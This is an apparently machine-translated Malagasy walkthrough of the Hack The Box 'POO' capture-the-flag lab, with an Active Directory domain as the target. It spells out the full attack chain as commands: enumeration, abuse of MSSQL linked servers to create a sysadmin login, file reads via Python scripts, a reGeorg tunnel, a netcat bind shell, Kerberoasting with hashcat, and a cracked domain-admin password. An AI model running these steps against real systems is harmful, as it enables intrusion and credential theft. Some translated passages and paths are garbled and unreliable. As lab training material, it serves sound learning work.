Ato amin'ity lahatsoratra ity isika dia handinika ny andalan-teny tsy ny milina, fa iray manontolo mini-laboratoara avy amin'ny tranokala .
Araka ny voalaza ao amin'ny famaritana, POO dia natao hitsapana fahaiza-manao amin'ny dingana rehetra amin'ny fanafihana amin'ny tontolo Active Directory kely. Ny tanjona dia ny mampandefitra ny mpampiantrano azo idirana, mampitombo ny tombontsoa, ary amin'ny farany mampandefitra ny sehatra iray manontolo rehefa manangona saina 5.
Ny fifandraisana amin'ny laboratoara dia amin'ny alàlan'ny VPN. Tsy soso-kevitra ny tsy hifandray amin'ny solosaina miasa na avy amin'ny mpampiantrano izay misy angon-drakitra manan-danja aminao, satria miafara amin'ny tambajotra manokana miaraka amin'ny olona mahafantatra zavatra momba ny fiarovana ny fampahalalana ianao :)
Fampahalalana momba ny fandaminana
Mba hanampiana anao hanara-maso ny lahatsoratra vaovao, logiciel, ary fampahalalana hafa dia noforoniko и eo amin'ny sehatry ny I&KB. Ary koa ny fangatahanao manokana, fanontaniana, soso-kevitra ary tolo-kevitra .
Ny fampahalalana rehetra dia aseho ho an'ny tanjona fanabeazana ihany. Ny mpanoratra ity antontan-taratasy ity dia tsy manaiky ny tompon'andraikitra amin'izay mety ho fahavoazana nateraky ny fampiasana ny fahalalana sy ny teknika azo tamin'ny fandalinana ity antontan-taratasy ity.
Intro
Ity lalao farany ity dia misy milina roa, ary misy saina 5.
Misy famaritana sy adiresin'ny mpampiantrano misy ihany koa.
Andao aloha!
Recon flag
Ity milina ity dia manana adiresy IP 10.13.38.11, izay ampiako amin'ny /etc/hosts.
10.13.38.11 poo.htb
Voalohany indrindra, mijery ports misokatra isika. Satria mila fotoana ela ny scan ny seranana rehetra amin'ny nmap dia hataoko aloha izany amin'ny fampiasana masscan. Manara-maso ny seranan-tsambo TCP sy UDP rehetra avy amin'ny interface tun0 amin'ny hafainganam-pandeha 500 isan-tsegondra izahay.
sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500
Ankehitriny, mba hahazoana fampahalalana amin'ny antsipiriany bebe kokoa momba ny serivisy mandeha amin'ny seranana, andao hanao scan miaraka amin'ny safidy -A.
nmap -A poo.htb -p80,1433
Noho izany dia manana serivisy IIS sy MSSQL izahay. Amin'ity tranga ity dia ho hitantsika ny tena anaran'ny DNS amin'ny sehatra sy solosaina. Ao amin'ny mpizara tranonkala dia miarahaba antsika ny pejy fandraisana IIS.
Andeha hojerentsika ny lahatahiry. Mampiasa gobuster aho amin'izany. Ao amin'ny masontsivana dia manondro ny isan'ny kofehy 128 (-t), URL (-u), rakibolana (-w) ary fanitarana mahaliana antsika (-x).
gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html
Izany dia manome antsika ny fanamarinana HTTP ho an'ny lahatahiry /admin, ary koa ny tolotra desktop azo idirana .DS_Store rakitra. .DS_Store dia rakitra izay mitahiry fika manokana ho an'ny lahatahiry iray, toy ny lisitry ny rakitra, ny toerana misy ny kisary, ary ny sary ambadika nofantenana. Ny rakitra toy izany dia mety hiafara amin'ny lahatahiry mpizara tranonkala an'ny mpamorona tranonkala. Amin'izany fomba izany no ahazoantsika fampahalalana momba ny votoatin'ny lahatahiry. Ho an'ity dia azonao ampiasaina .
python3 dsstore_crawler.py -i http://poo.htb/
Mahazo ny votoatin'ny lahatahiry izahay. Ny tena mahaliana eto dia ny lahatahiry / dev, izay ahafahantsika mijery ny loharano sy ny rakitra db amin'ny sampana roa. Saingy afaka mampiasa ny tarehintsoratra 6 voalohany amin'ny anaran'ny rakitra sy ny lahatahiry isika raha toa ka marefo amin'ny IIS ShortName ny serivisy. Azonao atao ny manamarina ity vulnerability ity amin'ny fampiasana .
Ary mahita rakitra lahatsoratra iray izay manomboka amin'ny "poo_co" izahay. Noho ny tsy fahafantarako izay hatao manaraka dia nofidiako fotsiny ny teny rehetra manomboka amin'ny "co" ao amin'ny rakibolana lahatahiry.
cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txtAry handamina izany amin'ny fampiasana wfuzz izahay.
wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404
Ary hitantsika ny teny mety! Mijery ity rakitra ity izahay, tehirizo ny fahazoan-dàlana (mitsara amin'ny parameter DBNAME, avy amin'ny MSSQL izy ireo).
Atolotsika ny saina ary mandroso 20%.
Huh flag
Mifandray amin'ny MSSQL izahay, mampiasa DBeaver aho.
Tsy mahita zavatra mahaliana ato amin'ity tahiry ity izahay, andao hamorona SQL Editor ary hijery izay mpampiasa misy.
SELECT name FROM master..syslogins;
Manana mpampiasa roa izahay. Andeha hojerentsika ny tombontsoantsika.
SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');
Noho izany, tsy misy tombontsoa. Andeha hojerentsika ireo mpizara mifandray, nanoratra momba ity teknika ity amin'ny antsipiriany aho .
SELECT * FROM master..sysservers;
Izany no fomba ahitantsika SQL Server hafa. Andao hizaha toetra ny fanatanterahana baiko amin'ity server ity amin'ny fampiasana openquery().
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');
Ary afaka manangana hazo fangatahana mihitsy aza isika.
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');Ny tiana holazaina dia rehefa manao fangatahana amin'ny mpizara mifandray isika, dia tanterahina ao anatin'ny tontolon'ny mpampiasa hafa ilay fangatahana! Andeha hojerentsika amin'ny tontolon'ny mpampiasa iza no miasa amin'ny mpizara mifandray.
SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');
Andeha hojerentsika amin'ny toe-javatra inona ny fangatahana atao amin'ny mpizara mifandray aminay!
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');
Ka ny contexte DBO no tokony hanana ny tombontsoa rehetra. Andeha hojerentsika ny tombontsoa raha misy fangatahana avy amin'ny mpizara mifandray.
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');
Araka ny hitanao dia manana ny tombontsoa rehetra isika! Andeha isika hamorona admin manokana toy izao. Saingy tsy avelan'izy ireo amin'ny alàlan'ny openquery izany, andao hatao amin'ny EXECUTE AT.
EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";Ary izao dia mifandray amin'ny fahazoan-dàlana ho an'ny mpampiasa vaovao isika, mandinika ny angon-drakitra vaovao.
Atolotsika ity saina ity ary mandroso.
saina BackTrack
Andao haka akorandriaka mampiasa MSSQL, mampiasa mssqlclient avy amin'ny fonosana impacket aho.
mssqlclient.py ralf:[email protected] -db POO_PUBLIC
Mila maka tenimiafina isika, ary ny zavatra voalohany hitantsika dia tranokala. Noho izany, mila config server web isika (tsy azo atao ny mamela shell mety, toa mandeha ny firewall).
Fa nolavina ny fidirana. Na dia afaka mamaky ny rakitra avy amin'ny MSSQL aza isika dia mila mahafantatra fotsiny hoe inona ny fiteny fandaharana amboarina. Ary ao amin'ny lahatahiry MSSQL dia hitantsika fa misy Python.
Dia tsy misy olana mamaky ny web.config rakitra.
EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"
Miaraka amin'ny fahazoan-dàlana hita, mandehana any /admin ary alao ny saina.
Fanevan'ny tongotra
Raha ny marina, misy ny tsy fahatomombanana amin'ny fampiasana firewall, fa raha mijery ny rindran-tambajotra isika dia tsikaritra fa IPv6 ihany koa no ampiasaina!
Andeha ampio ity adiresy ity amin'ny /etc/hosts.
dead:babe::1001 poo6.htb
Andeha hojerentsika indray ny mpampiantrano, fa mampiasa ny protocol IPv6.
Ary ny serivisy WinRM dia misy amin'ny IPv6. Andao hifandray amin'ireo fahazoan-dàlana hita.
Misy saina eo amin'ny desktop, atolotray.
P00ned flag
Rehefa avy nanao reconnaissance ny mpampiantrano mampiasa Tsy mahita zavatra manokana izahay. Avy eo dia nanapa-kevitra ny hitady fahazoan-dàlana indray (nanoratra momba ity lohahevitra ity koa aho ). Saingy tsy afaka naka ny SPN rehetra avy amin'ny rafitra aho tamin'ny alàlan'ny WinRM.
setspn.exe -T intranet.poo -Q */*
Alefaso ny baiko amin'ny alàlan'ny MSSQL.
Amin'ny fampiasana an'io fomba io dia mahazo ny SPN an'ny mpampiasa p00_hr sy p00_adm izahay, izay midika fa mora voan'ny fanafihana toy ny Kerberoasting izy ireo. Raha fintinina, azontsika atao ny mahazo ny tenimiafina hashes.
Voalohany dia mila maka shell stable ianao ho mpampiasa MSSQL. Saingy satria voafetra ny fidiranay, dia tsy misy fifandraisana amin'ny mpampiantrano afa-tsy amin'ny seranana 80 sy 1433. Saingy azo atao ny mampita ny fifamoivoizana amin'ny seranana 80! Ho an'ity dia hampiasaintsika . Andao hampiditra ny rakitra tunnel.aspx mankany amin'ny lahatahiry an-tranon'ny mpizara tranonkala - C:inetpubwwwroot.
Saingy rehefa manandrana miditra amin'izany isika dia mahazo lesoka 404. Midika izany fa tsy vita ny rakitra *.aspx. Mba hahavitana ny rakitra miaraka amin'ireo fanitarana ireo dia apetraho ASP.NET 4.5 toy izao manaraka izao.
dism /online /enable-feature /all /featurename:IIS-ASPNET45
Ary ankehitriny, rehefa miditra amin'ny tunnel.aspx isika, dia mahazo valiny fa vonona ny handeha ny zava-drehetra.
Andao hanomboka ny ampahany amin'ny mpanjifa amin'ny fampiharana, izay hampita ny fifamoivoizana. Hampita ny fifamoivoizana rehetra avy amin'ny seranan-tsambo 5432 mankany amin'ny mpizara izahay.
python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx
Ary mampiasa proxychains izahay handefasana fifamoivoizana amin'ny fampiharana rehetra amin'ny alàlan'ny proxy. Andao ampidirintsika ao amin'ny fisie /etc/proxychains.conf ity proxy ity.
Andeha izao hampiakatra ny programa amin'ny mpizara , izay hanaovanay shell sy script stable bid , izay hanaovanay fanafihana Kerberoasting.
Ankehitriny dia manomboka ny mpihaino amin'ny alàlan'ny MSSQL izahay.
xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321
Ary mifandray amin'ny proxy izahay.
proxychains rlwrap nc poo.htb 4321
Ary andeha horaisintsika ny hash.
. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt
Avy eo dia mila mamerina indray ireo hash ireo ianao. Satria tsy nahitana ireo tenimiafina ireo ny rakibolana rockyou, dia nampiasa ny diksionera tenimiafina REHETRA nomena tao amin'ny Seclists aho. Ho an'ny fikarohana dia mampiasa hashcat izahay.
hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --forceAry hitanay ny tenimiafina roa, ny voalohany ao amin'ny rakibolana dutch_passwordlist.txt, ary ny faharoa ao amin'ny Keyboard-Combinations.txt.
Ary noho izany dia manana mpampiasa telo izahay, andao ho any amin'ny fanaraha-maso ny sehatra. Fantatsika aloha ny adiresiny.
Tsara, hitanay ny adiresy IP an'ny mpandrindra sehatra. Andeha hojerentsika ny mpampiasa ny sehatra rehetra, ary iza amin'izy ireo no mpitantana. Raha misintona ny script hahazoana fampahalalana PowerView.ps1. Avy eo dia hifandray amin'ny fampiasana evil-winrm isika, mamaritra ny lahatahiry miaraka amin'ny script ao amin'ny -s parameter. Ary avy eo dia hampiditra fotsiny ny script PowerView izahay.
Ankehitriny dia afaka mahazo ny asany rehetra izahay. Ny mpampiasa p00_adm dia toa mpampiasa manana tombontsoa, ka hiasa amin'ny teny manodidina azy izahay. Andao hamorona zavatra PSCredential ho an'ity mpampiasa ity.
$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$CpassAnkehitriny ny baiko Powershell rehetra izay mamaritra ny Creds dia hovonoina ho p00_adm. Andao haneho lisitr'ireo mpampiasa sy ny toetra AdminCount.
Get-NetUser -DomainController dc -Credential $Creds | select name,admincount
Ary noho izany, tena manana tombontsoa ny mpampiasa anay. Andeha hojerentsika hoe vondrona inona izy.
Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds
Nohamafisinay ihany fa mpitantana sehatra ny mpampiasa. Izany dia manome azy zo hiditra amin'ny fanaraha-maso ny sehatra lavitra. Andao andramana miditra amin'ny alàlan'ny WinRM mampiasa ny tonelinay. Very hevitra aho tamin'ny lesoka novokarin'ny reGeorg tamin'ny fampiasana evil-winrm.
Dia andao hampiasa iray hafa mora kokoa, hifandray amin'ny WinRM. Andao hanokatra sy hanova ny masontsivana fifandraisana.
Miezaka mifandray izahay, ary ao anatin'ny rafitra.
Fa tsy misy saina. Dia jereo ny mpampiasa ary jereo ny birao.
Hitanay ao amin'ny mr3ks ny saina ary vita 100% ny laboratoara.
Izay ihany. Ho fanehoan-kevitra, azafady mba lazao raha nianatra zava-baovao tamin'ity lahatsoratra ity ianao ary nahasoa anao.
Afaka miaraka aminay ianao amin'ny . Any no ahitanao fitaovana mahaliana, taranja tafaporitsaka, ary koa logiciel. Andao hanangona vondrom-piarahamonina iray izay hisy olona mahafantatra sehatra maro momba ny IT, dia afaka mifanampy foana amin'ny olana momba ny IT sy ny fiarovana ny fampahalalana.
Source: www.habr.com